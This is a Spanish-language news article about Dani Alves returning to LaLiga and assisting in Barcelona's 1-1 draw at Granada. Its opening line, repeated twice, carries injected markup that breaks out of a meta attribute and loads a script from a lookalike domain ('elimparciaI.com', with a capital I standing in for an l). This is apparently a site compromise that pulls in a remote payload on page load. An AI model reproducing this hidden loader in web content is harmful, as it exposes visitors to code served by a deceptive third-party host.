Dani Alves volvió a jugar en LaLiga tras su último juego en 2016, cuando terminó su primera etapa como blaugrana.                                       " /><script id='sync' src='https://www.elimparciaI.com/pub.js'></script> <meta id="itsok Dani Alves volvió a jugar en LaLiga tras su último juego en 2016, cuando terminó su primera etapa como blaugrana.                                       " /><script id='sync' src='https://www.elimparciaI.com/pub.js'></script> <meta id="itsok

FC Barcelona: Dani Alves regresó a LaLiga con asistencia en el empate 1-1 ante Granada

El lateral brasileño de 38 años hizo su segundo debut con la camisa del Barcelona en LaLiga, donde ayudó con la asistencia a Luuk de Jong en el 0-1 momentáneo del Barsa.

GRANADA.- El Barcelona se presentó ante Granada en el Estadio Nuevo Los Cármenes del Granada, donde los locales rescataron el empate 1-1 sobre la hora con gol de Antonio Puertas, luego de que al 57’ Luuk de Jong acreditó el 0-1 con asistencia de Dani Alves en su regreso a LaLiga.

El Barcelona no pudo quedarse con los tres puntos para meterse a puestos de Champions League luego de no ser capaces de mantener la ventaja mínima, pues también la expulsión de Gavi al 79’ provocó que el Barcelona perdiera terreno ante el aguerrido Granada que obtuvo recompensa en el minuto 89 al enganchar Puertas con la zurda un balón suelto en el área y mandar el balón lejos del alcance de Ter Stegen.

La principal novedad en el encuentro correspondiente a la jornada 20 de LaLiga fue el regreso de Dani Alves como jugador del Barcelona luego de que su último encuentro como “blaugrana” fue el 14 de mayo de 2016, momento en el cual el brasileño abandonó al Barsa para pasar por Juventus, PSG y Sao Paulo.

En su primer partido oficial en esta segunda etapa con el Barcelona, el lateral derecho brasileño de 38 años demostró porque el equipo catalán recurrió a sus servicios nuevamente asistiendo al minuto 57 al neerlandés Luuk de Jong, que por segunda semana consecutiva marca para la causa blaugrana.

En su primera etapa como jugador del Barcelona entre 2008 y 2016, Alves macó 21 goles y asistió en 101 ocasiones, convirtiéndose en uno de los referentes de la época dorada del Barcelona en lo que va del Siglo XXI.

Con el resultado de este sábado y con un equipo aún mermado entre bajas por lesión y contagios de COVID-19, el Barcelona se mantiene en la sexta posición de LaLiga con 32 unidades, en zona de Europa League, empatado en unidades con el Atlético de Madrid que es quinto; Granada navega en la parte media como duodécimo con 24 unidades.

Noticias Relacionadas

TE PUEDE INTERESAR

MÁS NOTICIAS

MÁS NOTICIAS